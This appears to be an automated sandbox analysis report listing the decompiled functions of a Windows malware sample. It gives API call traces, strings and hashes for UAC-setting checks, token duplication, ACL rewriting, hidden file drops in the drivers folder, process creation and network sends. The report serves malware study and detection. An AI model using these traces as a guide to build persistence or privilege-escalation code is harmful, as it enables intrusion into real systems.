                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "$PromptOnSecureDesktop
                                                                                        • API String ID: 3433985886-3108538426
                                                                                        • Opcode ID: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction ID: 2be8177c38fcb0431c37abdcb30432b02610efeff0693f38a05b2573c300e2d4
                                                                                        • Opcode Fuzzy Hash: 58688efdc745e23d79e1c9d42d0b110b33b2b67bc428880df89735915a056cb6
                                                                                        • Instruction Fuzzy Hash: E8C1F171D04209ABEB119BA5DC45BEF7BB9EF04310F1004B7F504B72D1EA79AE908B69
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000101,75920F10,?,75920F10,00000000), ref: 004070C2
                                                                                        • RegEnumValueA.KERNELBASE(75920F10,00000000,?,00000020,00000000,00000000,00000000,0000012C,?,75920F10,00000000), ref: 0040719E
                                                                                        • RegCloseKey.KERNELBASE(75920F10,?,75920F10,00000000), ref: 004071B2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407208
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407291
                                                                                        • ___ascii_stricmp.LIBCMT ref: 004072C2
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004072D0
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 00407314
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 0040738D
                                                                                        • RegCloseKey.ADVAPI32(75920F10), ref: 004073D8
                                                                                          • Part of subcall function 0040F1A5: lstrlenA.KERNEL32(000000C8,000000E4,PromptOnSecureDesktop,000000C8,00407150,?), ref: 0040F1AD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$AttributesEnumFileOpenValue___ascii_stricmplstrlen
                                                                                        • String ID: $"$PromptOnSecureDesktop
                                                                                        • API String ID: 4293430545-98143240
                                                                                        • Opcode ID: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction ID: bdd769efad709bd93da993ba4a974553bca105625a5613f565cdc8f40f8c6bf1
                                                                                        • Opcode Fuzzy Hash: 74e128f8df151d438ab4d1c82f82d45ce79a9eea08151c9b6eb13cdb2253fb65
                                                                                        • Instruction Fuzzy Hash: 8FB17F71D0820ABAEB159FA1DC45BEF77B8AB04304F10047BF501F61D1EB79AA94CB69
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 0040677E
                                                                                        • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 0040679A
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 004067B0
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 004067BF
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 004067D3
                                                                                        • ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,75920F10,00000000), ref: 00406807
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040681F
                                                                                        • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 0040683E
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 0040685C
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000028,00408244,00000000,?,75920F10,00000000), ref: 0040688B
                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,75920F10,00000000), ref: 00406906
                                                                                        • ReadFile.KERNEL32(000000FF,004121A8,00000000,00408244,00000000,?,75920F10,00000000), ref: 0040691C
                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,75920F10,00000000), ref: 00406971
                                                                                          • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                          • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 1400801100-0
                                                                                        • Opcode ID: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction ID: 23622665348289c9bdc7ba1e7bdf6275147e3319f3664adf7917ee5564634b96
                                                                                        • Opcode Fuzzy Hash: d05b9ef8185a7d6987771a176bb27021890da5eba797bb42cdabcd388c34deb0
                                                                                        • Instruction Fuzzy Hash: E47109B1D00219EFDB109FA5CC809EEBBB9FB04314F11457AF516B6290E7349EA2DB54
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0261024D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: cess$kernel32.dll
                                                                                        • API String ID: 4275171209-1230238691
                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction ID: 5774ec0492e1ed75388dcceda0e4cbf8f0944c93cfc0f584de3cb1d391b68c67
                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction Fuzzy Hash: 1A526974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA95DF14
                                                                                        APIs
                                                                                        • lstrcpyA.KERNEL32(?,?,00000100,PromptOnSecureDesktop,00000000,?,00409E9D,?,00000022,?,?,?,?,?,?,?), ref: 004099DF
                                                                                        • lstrcatA.KERNEL32(00000022,00000000,?,?,00409E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 00409A3C
                                                                                        • lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,00409E9D,?,00000022,?,?,?), ref: 00409A52
                                                                                          • Part of subcall function 00406A60: CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,75918A60,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406A7D
                                                                                          • Part of subcall function 00406A60: GetDiskFreeSpaceA.KERNELBASE(00409E9D,00409A60,?,?,?,PromptOnSecureDesktop,?,?,?,00409A60,?,?,00409E9D), ref: 00406ABB
                                                                                          • Part of subcall function 00406A60: GetLastError.KERNEL32(?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B40
                                                                                          • Part of subcall function 00406A60: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B4E
                                                                                          • Part of subcall function 00406A60: DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,00409A60,?,?,00409E9D), ref: 00406B80
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Filelstrcat$CloseCreateDeleteDiskErrorFreeHandleLastSpacelstrcpy
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 4131120076-2980165447
                                                                                        • Opcode ID: e18185d0f37ace2058eb608823ad36cbc71581f24a02a40a50f5e6d881590964
                                                                                        • Instruction ID: c4e01e0c9c22f42140b45f86cbdbc152d24ce0e59ed2090f1037bb69612005af
                                                                                        • Opcode Fuzzy Hash: e18185d0f37ace2058eb608823ad36cbc71581f24a02a40a50f5e6d881590964
                                                                                        • Instruction Fuzzy Hash: 0501A27294020877EA103F62EC47F9F3F1DEB44728F00483AF619790D2D9BA95709AAC
                                                                                        APIs
                                                                                        • CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,PromptOnSecureDesktop,004042B6,00000000,00000001,PromptOnSecureDesktop,00000000,?,004098FD), ref: 00404021
                                                                                        • GetLastError.KERNEL32(?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 0040402C
                                                                                        • Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404046
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateErrorFileLastSleep
                                                                                        • String ID: PromptOnSecureDesktop
                                                                                        • API String ID: 408151869-2980165447
                                                                                        • Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
                                                                                        • Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
                                                                                        • Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D
                                                                                        APIs
                                                                                        • WriteFile.KERNELBASE(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                        • WriteFile.KERNELBASE(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite
                                                                                        • String ID: ,k@
                                                                                        • API String ID: 3934441357-1053005162
                                                                                        • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                        • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                        • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                        APIs
                                                                                        • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000023,00000000,00000000), ref: 004092CF
                                                                                        • Sleep.KERNELBASE(000001F4,00000000,00000000,000000C8), ref: 004092F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExecuteShellSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4194306370-0
                                                                                        • Opcode ID: 3372c8ca0f183eb5491d8b73672d2af1eba7a86cb059b25099cdfc4087d6fc87
                                                                                        • Instruction ID: 2238cefa34e52eac0eed51a1b9fc18e9663c37cde2c16e9a3df151323357230f
                                                                                        • Opcode Fuzzy Hash: 3372c8ca0f183eb5491d8b73672d2af1eba7a86cb059b25099cdfc4087d6fc87
                                                                                        • Instruction Fuzzy Hash: E941EE718083497EEB269664988C7E73BA49B52300F2809FFD492B72D3D7BC4D818759
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02610223,?,?), ref: 02610E19
                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02610223,?,?), ref: 02610E1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction ID: 323a148d031aa8979a0654940c3340b49206a3e0f742dbfe92ff6cd918eee192
                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction Fuzzy Hash: 25D0123114512877DB002A95DC09BCD7B1CDF05B66F048011FB0DD9180C770954046E5
                                                                                        APIs
                                                                                          • Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,PromptOnSecureDesktop,000000E4,00406DDC,000000C8), ref: 00406CE7
                                                                                          • Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
                                                                                          • Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 00406D14
                                                                                          • Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B
                                                                                        • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
                                                                                        • String ID:
                                                                                        • API String ID: 1823874839-0
                                                                                        • Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
                                                                                        • Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
                                                                                        • Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C
                                                                                        APIs
                                                                                        • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02610929
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081215356.0000000002610000.00000040.00001000.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ProcessTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 560597551-0
                                                                                        • Opcode ID: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction ID: 46c7c7c6dcd93c711cbd188b681eb9ae36fa97d9339837816e323f92b9b16bc3
                                                                                        • Opcode Fuzzy Hash: ed1fa5443604d132978e6c58f8cc4a5f1646693310c318f56ccf6213ab4b7ad9
                                                                                        • Instruction Fuzzy Hash: 9F90043034437511DC3035DC0C01F4500133741734F7047307533DD1D0C54157004117
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02678D76
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2081266908.0000000002669000.00000040.00000020.00020000.00000000.sdmp, Offset: 02669000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction ID: 1a9c701d81292baff1cf18cab14a89e24b6036db34bb63cf2f323b8052fb432a
                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction Fuzzy Hash: 3D113C79A00208EFDB01DF98C989E99BFF5AF08350F158094F9489B361D371EA90EF80
                                                                                        APIs
                                                                                        • closesocket.WS2_32(?), ref: 0040CA4E
                                                                                        • closesocket.WS2_32(?), ref: 0040CB63
                                                                                        • GetTempPathA.KERNEL32(00000120,?), ref: 0040CC28
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040CCB4
                                                                                        • WriteFile.KERNEL32(0040A4B3,?,-000000E8,?,00000000), ref: 0040CCDC
                                                                                        • CloseHandle.KERNEL32(0040A4B3), ref: 0040CCED
                                                                                        • wsprintfA.USER32 ref: 0040CD21
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040CD77
                                                                                        • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 0040CD89
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040CD98
                                                                                        • CloseHandle.KERNEL32(?), ref: 0040CD9D
                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040CDC4
                                                                                        • CloseHandle.KERNEL32(0040A4B3), ref: 0040CDCC
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040CFB1
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 0040CFEF
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 0040D033
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0040D10C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 0040D155
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0040D171
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040D195
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040D19C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002), ref: 0040D1C8
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D231
                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D27C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D2AB
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2C7
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2EB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D2F2
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D326
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 0040D372
                                                                                        • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000100), ref: 0040D3BD
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 0040D3EC
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D408
                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 0040D428
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 0040D42F
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 0040D45B
                                                                                        • CreateProcessA.KERNEL32(?,00410264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040D4DE
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4F4
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D4FC
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 0040D513
                                                                                        • closesocket.WS2_32(?), ref: 0040D56C
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040D577
                                                                                        • ExitProcess.KERNEL32 ref: 0040D583
                                                                                        • wsprintfA.USER32 ref: 0040D81F
                                                                                          • Part of subcall function 0040C65C: send.WS2_32(00000000,?,00000000), ref: 0040C74B
                                                                                        • closesocket.WS2_32(?), ref: 0040DAD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                        • String ID: .dat$.sys$4$@$PromptOnSecureDesktop$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                        • API String ID: 562065436-3791576231
                                                                                        • Opcode ID: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
                                                                                        • Instruction ID: 1bec03d5b3261cfbda03ea9d0ba23ae7472bbf6119f1c93de8fbd0284471d070
                                                                                        • Opcode Fuzzy Hash: 9e4fe3788f012a04d44cc6c5e4c1fd3e816f3d6647e3ed2456f4b6deaabaf357
                                                                                        • Instruction Fuzzy Hash: 1BB2B471D00209BBEB209FA4DD85FEA7BB9EB08304F14457BF505B22D1D7789A898B5C
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(ntdll.dll,00000000,00401839,00409646), ref: 00401012
                                                                                        • GetProcAddress.KERNEL32(?,RtlExpandEnvironmentStrings_U), ref: 004010C2
                                                                                        • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 004010E1
                                                                                        • GetProcAddress.KERNEL32(?,NtTerminateProcess), ref: 00401101
                                                                                        • GetProcAddress.KERNEL32(?,RtlFreeSid), ref: 00401121
                                                                                        • GetProcAddress.KERNEL32(?,RtlInitUnicodeString), ref: 00401140
                                                                                        • GetProcAddress.KERNEL32(?,NtSetInformationThread), ref: 00401160
                                                                                        • GetProcAddress.KERNEL32(?,NtSetInformationToken), ref: 00401180
                                                                                        • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 0040119F
                                                                                        • GetProcAddress.KERNEL32(?,NtClose), ref: 004011BF
                                                                                        • GetProcAddress.KERNEL32(?,NtOpenProcessToken), ref: 004011DF
                                                                                        • GetProcAddress.KERNEL32(?,NtDuplicateToken), ref: 004011FE
                                                                                        • GetProcAddress.KERNEL32(?,RtlAllocateAndInitializeSid), ref: 0040121A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: NtClose$NtDuplicateToken$NtFilterToken$NtOpenProcessToken$NtQueryInformationToken$NtSetInformationThread$NtSetInformationToken$NtTerminateProcess$RtlAllocateAndInitializeSid$RtlExpandEnvironmentStrings_U$RtlFreeSid$RtlInitUnicodeString$RtlLengthSid$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                        • API String ID: 2238633743-3228201535
                                                                                        • Opcode ID: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction ID: c8dd2db2df3f08e17c6117e54d1286841a2c4197db930f8a9693796d5e259140
                                                                                        • Opcode Fuzzy Hash: 099c329b46637f9171a1ca57a4c5e0107e32006a0b8f6d8903d04b45664d461e
                                                                                        • Instruction Fuzzy Hash: 2F5100B1662641A6D7118F69EC84BD23AE86748372F14837B9520F62F0D7F8CAC1CB5D
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(0003E800,?,0003E800,00000000), ref: 0040B2B3
                                                                                        • FileTimeToLocalFileTime.KERNEL32(00000000,00000000,?,0003E800,00000000), ref: 0040B2C2
                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B2D0
                                                                                        • SystemTimeToFileTime.KERNEL32(0003E800,00000000), ref: 0040B2E1
                                                                                        • FileTimeToSystemTime.KERNEL32(00000000,0003E800), ref: 0040B31A
                                                                                        • GetTimeZoneInformation.KERNEL32(?), ref: 0040B329
                                                                                        • wsprintfA.USER32 ref: 0040B3B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Time$File$System$Local$InformationZonewsprintf
                                                                                        • String ID: %s, %u %s %u %.2u:%.2u:%.2u %s%.2u%.2u$Apr$Aug$Dec$Feb$Fri$Jan$Jul$Jun$Mar$May$Mon$Nov$Oct$Sat$Sep$Sun$Thu$Tue$Wed
                                                                                        • API String ID: 766114626-2976066047
                                                                                        • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction ID: 3cccae2c5b68faf9d5e65ebc3321ef0303f497beb4f825406ae493c25d793f5b
                                                                                        • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                        • Instruction Fuzzy Hash: D8510EB1D0021CAADF18DFD5D8495EEBBB9EF48304F10856BE501B6250E7B84AC9CF98
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 0040782F
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00407866
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00407878
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0040789A
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00407F63,?), ref: 004078B8
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 004078D2
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 004078E3
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 004078F1
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407901
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 00407910
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407917
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00407933
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00407963
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 0040798A
                                                                                        • DeleteAce.ADVAPI32(?,00000000), ref: 004079A3
                                                                                        • EqualSid.ADVAPI32(?,00407F63), ref: 004079C5
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407A4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407A58
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00407A69
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 00407A79
                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407A87
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2079321759.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2079321759.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
                                                                                        • Instruction ID: df0c13f2d89176358eaf39038022480abc221899387876bf5e0f356ce13a0778
                                                                                        • Opcode Fuzzy Hash: bb30bf074c347c8653546d93d28bb934471e976575b6637e302f0e375d0d0c6d
